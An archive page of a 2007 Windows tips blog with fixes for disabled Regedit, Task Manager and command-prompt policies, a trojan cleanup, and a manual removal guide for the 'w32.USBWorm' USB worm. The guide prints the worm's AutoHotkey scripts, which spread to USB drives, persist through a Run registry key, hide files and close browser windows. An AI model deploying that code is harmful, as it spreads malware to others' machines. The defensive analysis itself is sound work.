Tips Tricks And Collections: October 2007

This error occurs if the DisableRegistryTools Policy is enabled. With this policy enabled, you receive the following error message when you start the Registry Editor (regedit.exe):
Registry Editing has been disabled by your administrator

IMPORTANT: If this policy was enabled in your system (not connected to a corporate network) without you doing anything or without your knowledge, then it's highly likely that a Virus has blocked the usage of Registry Editor (Regedit.exe) in your system by enabling the DisableRegistryTools policy via the registry. It's highly recommended that you perform a thorough checkup of your system immediately. Steps listed in this article will help you unblock the Registry Editor, but that does not remove the Virus (if any) from your system.

For standalone Windows XP systems, perform the steps below to remove the registry editing restrictions.
Method 1: Using the REG.EXE console tool
1. Click Start, Run and type this command:

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

You should be able to launch Tweak UI, as well as the Registry Editor.

Method 2: Using the Group Policy Editor (Windows XP Professional only)
->Click Start, Run and type gpedit.msc and press ENTER
-> Go to the following location:

User Configuration Administrative Templates System

-> Double-click Disable registry editing tools and set it to Not Configured
-> Exit the Group Policy Editor

Note: If the setting already reads Not Configured, set it to Enabled, and click Apply. Then revert it back to Not Configured. This ensures that the DisableRegistryTools registry value is removed successfully.

Wednesday, October 17, 2007

"Task Manager Has been Disabled"

When you try to open Task Manager, the following error may occur:
"Task Manager has been disabled by your administrator "

Method 1
Click Start, Run and type this command exactly as given below: (better - Copy and paste)

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

Method 2
Download and run this REG fix and double-click it.

Method 3
-> Click Start, Run and type Regedit.exe
-> Navigate to the following branch:

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System
-> In the right-pane, delete the value named DisableTaskMgr
-> Close Regedit.exe

Method 4: Using Group Policy Editor - for Windows XP Professional
-> Click Start, Run, type gpedit.msc and click OK.
-> Navigate to this branch:

User Configuration / Administrative Templates / System / Ctrl+Alt+Delete Options / Remove Task Manager

-> Double-click the Remove Task Manager option.
-> Set the policy to Not Configured.

"Command Prompt has been Disabled"

When you attempt to run CMD.exe or a batch file, you may receive the message:

"The command prompt has been disabled by your administrator".

This is caused by restrictions placed in Registry. DisableCMD value is set to 1 or 0 via Group Policy.

To enable Task Manager, try any of these methods:

Method 1: Using the console registry tool
-> Click Start, Run and type this command exactly as given below: (better - Copy and paste)

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Method 2: Edit the registry directly
-> Open Registry Editor (Regedit.exe) and navigate to:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]

-> In the right-pane, double-click DisableCMD and set it's data to 0

Method 3: Using Group Policy Editor in Windows XP Professional.
-> Click Start, Run, type gpedit.msc and click OK.

-> Navigate to User Configuration\Administrative Templates\System
-> Double-click the Prevent access to the command prompt

You can then disable or set the policy to Not Configured. Disabling or setting this policy to Not Configured should solve the problem.

Monday, October 15, 2007

Unwanted Popups and Disabled Control Panel

Hi, For the last few days, I keep getting a pop up every 5 minutes saying

Windows Security Alert "warning! potential spyware operation! Your computer is making unauthorized copies of your system and Internet files. Run full scan now to pervent any unathorised access to your files! Click YES to download spyware remover ... "

I use AVG Free edition, and it recognized the virus, named "Trojan Horse Downloader.Small.AJY", and put it in the Vault.
But there is one file that AVG also found, but it says the file is not a threat. This one:

C:\WINDOWS\System 32\drivers\etc\hosts

So I still have 2 problems:
1. the incessant popup mentioned above, and
2. I cannot access things like my Control Panel, or the Date function at the bottom right corner, there is a Restrictions error message saying:

"This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator".

It seems the 'hosts' file is the problem, but is something important so I likely shouldn't delete it.I have done a few things like installing and running AVG Anti-Spyware 7.5 in safe mode, and it detected a few things and put them into Quarantine, but the problem persists. The other apps I used didn't find much.

Well but thanks to ComboFix which fixed all my problems and that too without affecting my system. Perform the following steps to fix this problem:

1. Download ComboFix from one of the links below:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
2. Double click combofix.exe & follow the prompts.

Note: Do not mouseclick combofix's window while it's running. That may cause it to stop.

ComboFix will create a folder called QooBox in C: (C:\QooBox). It will contain any folders that were quarantined. When you are done you can delete this folder - QooBox.

Friday, October 12, 2007

Test Drive Microsoft Office 2007

For all those who want to try Microsoft Office 2007 Beta 2, but don’t want to take the pain of downloading or installing it can now take a Test Drive of Microsoft Office 2007 online.
The real-time test drive does not require product installation or download—it’s the fastest way to try out 2007 Microsoft Office system programs. In just minutes you can start exploring Microsoft Office through your Web browser on your own, or follow the step-by-step tutorials to experience all of its useful features

According to Microsoft’s Press Release:
With the online test-drive, people can experience products directly for themselves to learn how the next release can help them better manage documents, organize their work and collaborate with others. In just minutes, anyone with access to an Internet connection can try out the latest improvements to familiar Microsoft Office applications using sample data to demo editing documents, sending e-mail, and posting to Microsoft Office SharePoint® sites to illustrate real-time collaboration functionality. The system is set up not only with Microsoft Office client applications, but also with server offerings pre-populated with data to allow people to easily experience the new server functionality in Microsoft Office. This is the first online test-drive made available before the launch of a Microsoft Office release, and it features 18 product-specific tutorials with step-by-step instructions covering most Office system client products and servers, including Office SharePoint Server 2007 and Office Project Server 2007.

The Test Drive Includes:

Microsoft Office Access 2007
Microsoft Office Excel 2007
Microsoft Office InfoPath 2007
Microsoft Office OneNote 2007
Microsoft Office Outlook 2007
Microsoft Office Outlook 2007 with Business Contact Manager
Microsoft Office Outlook Web Access
Microsoft Office PowerPoint 2007
Microsoft Office Project Professional 2007
Microsoft Office Publisher 2007
Microsoft Office SharePoint Designer 2007
Microsoft Office Visio 2007
Microsoft Office Word 2007
Microsoft Windows SharePoint Services
Microsoft Office Project Server 2007 (coming soon)
Microsoft Office SharePoint Server 2007

Sunday, October 7, 2007

Saturday, October 6, 2007

One-Click Shutdown

Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut).
You should now see a pop-up window instructing you to enter a command line path.
Use this path in "Type Location of the Item"

SHUTDOWN -s -t 01

If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive.
Click the "Next" button. Name the shortcut and click the "Finish" button.
Now whenever you want to shut down, just click on this shortcut and you're done.

Tuesday, October 2, 2007

w32.USBWorm. Lets Remove This Worm Manually

Yesterday, my friend gave me a usb and asked me to copy some ebooks and music into the disk. I took it home and plugged the USB into my system and scanned it with AVG. I detected some viruses which it removed successfully, least I knew that there was another worm which didn’t get detected and it was in to infect my system. I double clicked the USB drive and nothing happened. Hmm strange.. I right clicked and opened the USB drive and found there was no content. Autoplay appears only if there is a Autorun.inf file present in the root of the drive. I didn’t care it much and closed the window to copy data into the drive later.

I wanted to check my mail so ran my beloved browser Firefox, it opened and with in couple of seconds a message box popped up which said ” “I DNT HATE MOZILLA BUT USE IE OR ELSE…” and the header read “USE INTERNET EXPLORER YOU DOPE.” I was like what? It also terminated Firefox . This is when I remembered the Autoplay option in the usb drive. This is when I had to open Internet Explorer and Google this text and found the worm name is w32.USBWorm (it was now obvious). Next step was to search for a Removal Tool and to my amazement there was none available!! Nor I could find any information on how to remove it. I decided to give myself a try to remove this worm. I tried opening orkut and Bang another surprise. This is the message it popped up ” ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? ” now this is pissing me off. Now, i had no other option but to remove this worm from my system. I pressed ctrl+alt+del and found nothing suspesious there .

Lets see what this worm does

It runs a exe file which is name MicrosoftPowerpoint.exe which is located in the USB disk. The autorun.inf runs this file when double clicked. Once this program is run you are infected. It hides all your hidden folders, runs the process in the memory, makes the worm to start with windows and pops those annoying messages. This worm doesn’t destroy any system files. It just infects other USB drives and spreads to new hosts.

It’s time to KO the Worm
I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text files.

[offspring] - Blank Folder

2.mp3 - A laughing sound

Icon.ico - A blank Icon file

reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%settimer,reproduce,5000
return

reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1
}
}
}

regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\ CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txtRegwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\ CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe
C:\heap41a\std.txt
return

svchost.exe
This is the file that is the culprit. The file responsible for all the annoying pop ups

script1.txt
#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}

ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_classIEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
}
return

std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalueifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.

These are the keys that were responsible for the hidden folder problem I faced earlier

regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalueifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2

Now to rectify this go to Start Menu>Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all” key reset it back to 1 from 2.

Now you can change the settings in the folders option.

Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run which says heap41a.

Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.

All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.

I Dont Hate Mozilla! Orkut Is Banned!!

I was asked by my friend that he is the only user in his computer, his account is having administrative rights, but he is not able to open Orkut, and it says Orkut is banned. Another friend had told that he is not able to use Mozilla Firefox and it asks him to use Internet Explorer. I just told it must be some virus, but really didn't care much about that. But none of the antivirus software could detect or remove this malware.

My friend had given me a pen drive. I remembered it while browsing net on Firefox. When I put that in my PC and double clicked, it didn't open. I knew at once: I had activated a virus. But I didn't have any idea about the kind of virus that might have come to my PC, until I switched back to Firefox. Immediately a message box was displayed: I DNT HATE MOZILLA BUT USE IE OR ELSE... with title as USE INTERNET EXPLORER U DOPE. I just remembered the experiences of my friends. I tried to locate the virus by running the Task Manager. But there were no suspicious entries there. I had to bow the owner of the virus. I used Internet Explorer to search about it. The first entry in Google took me to the Mozilla Forum page, and after going through some pages, I came to know that the same virus also displayed another message when you opened Orkut. Orkut is banned you fool, The administrators didnt write this program guess who did?? MUHAHAHA!! with title ORKUT IS BANNED. Well, a similar message was displayed for YouTube also. So I went through all the posts, and finally found a solution given here:

Press CTRL+ALT+DEL and go to the processes tab

Look for svchost.exe under the image name. There will be many but look for the ones which have your username under the username

Press DEL to kill these files. It will give you a warning, Press Yes

Repeat for more svchost.exe files with your username and repeat. Do not kill svchost.exe with system, local service or network service!

Now open My Computer

In the address bar, type C:\heap41a and press enter. It is a hidden folder, and is not visible by default.

Delete all the files here

Now go to Start --> Run and type Regedit

Go to the menu Edit --> Find

Type "heap41a" here and press enter. You will get something like this "[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt"

Select that and Press DEL. It will ask "Are you sure you wanna delete this value", click Yes

Now close the registry editor.

Now the virus is gone. But be sure to delete the autorun.inf file and any folder whose name ends with .exe in the pen drive.

UPDATE:
It seems that they have named this malware as w32.USBWorm and according my friend, Avast is able to detect and remove it. I hope the other antivirus software will also be able to remove it soon.

This virus is not responsible for disabling Folder Options in the Tools Menu and not allowing hidden files to be shown. It is some other virus, and the solution is explained in the post Hidden Files Not Shown

Secure your Computer - The Best Things In Life are Free

Lately I have been hearing a lot of complaints from my friends about virus attacks. We all know that precaution is better than cure. It is easy to protect our PC from malwares than scratch our head to get rid of them after they get in. So here are some tips which won't cost you anything, but make your PC as safe as it can be:

Web Browser:
Most of the malwares and adwares find their way into the PC from the Internet and if your browser application is not good enough to block the harmful contents, what good is that for? Almost all the browsers have pitfalls, but Mozilla Firefox is the most secure web browser till date.
Download Firefox here

Antivirus:
A good antivirus will always keep your PC clean. But it should not eat up most of the PC resources scanning each and every wanted/unwanted files. Avast Home Edition is a simple and easy to use antivirus, that has automatic updates. Its requires a key that is obtained by registering in the site for free.
Download Avast here

Antispyware:
There are many antispywares which brag about their features. Honestly, most of them are useless. SpyBot S&D is a good one, which provides immunity from known threats and registry tweaks. It also has update feature, which enables you to be insusceptible to the most recent vulnerabilities.
Download SpyBot S&D here

System Optimization Tool:
Registry Cleaners, Duplicate / Unnecessary / Temporary File Managers, Internet History / Cookie Managers all fall under this category. But CCleaner and EasyCleaner are two such tools, which provide almost everything you want.
Download CCleaner here Download EasyCleaner here

You can protect your PC from 99% of the attacks if you have the above mentioned softwares. There are some other tools such as Firewalls and Internet Security Suites which, I think, are unnecessary for personal use. Trust me, I've not got any virus in the last two years, apart from w32.USBWorm which can be removed manually using the steps given here. All these tools are freewares, which means you can download them from their site free of charge. The best things in life are free.

If you have anything to discuss about these or have a better solutions/tips, you are welcome to share them.

Hidden Files Not Shown

Recently virus programmers are becoming smart. A worm w32.USBWorm which attacked and banned Orkut, has left one more problem. (Here are the steps to remove w32.USBWorm). You will not be able to see the hidden files. Even if you change the setting in the folder options, it will not show the hidden files. So here are the steps to remove that problem and make the hidden files appear as before.

1. Go to Start --> Run, then type Regedit

2. Navigate to the registry folder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
3. Find a key called CheckedValue.

4. Double Click CheckedValue key and modify it to 1. This is to show all the hidden files.

Now you should be able to view all the hidden files, and also to alter its status from folder options.

This is where I found the solution.

UPDATE:
If the virus is still present, this solution may not work permanently. Once you restart the PC, the hidden files will be concealed once again. I recommend using Avast antivirus, but remember to change security level from Medium to High after you install it.

Tips Tricks And Collections

Categories

Subscribe via email

Favourite Blogs

Archive

Thursday, October 18, 2007

Free eBooks Links

Post a Comment

"Registry Editing is Disabled"

Post a Comment

Wednesday, October 17, 2007

"Task Manager Has been Disabled"

Post a Comment

"Command Prompt has been Disabled"

Post a Comment

Monday, October 15, 2007

Unwanted Popups and Disabled Control Panel

Post a Comment

Friday, October 12, 2007

Test Drive Microsoft Office 2007

Post a Comment

Sunday, October 7, 2007

Cool Proxy Sites

Post a Comment

Saturday, October 6, 2007

One-Click Shutdown

Post a Comment

Tuesday, October 2, 2007

w32.USBWorm. Lets Remove This Worm Manually

Post a Comment

I Dont Hate Mozilla! Orkut Is Banned!!

Post a Comment

Secure your Computer - The Best Things In Life are Free

Post a Comment

Hidden Files Not Shown

Post a Comment

Tips Tricks And Collections Headline Animator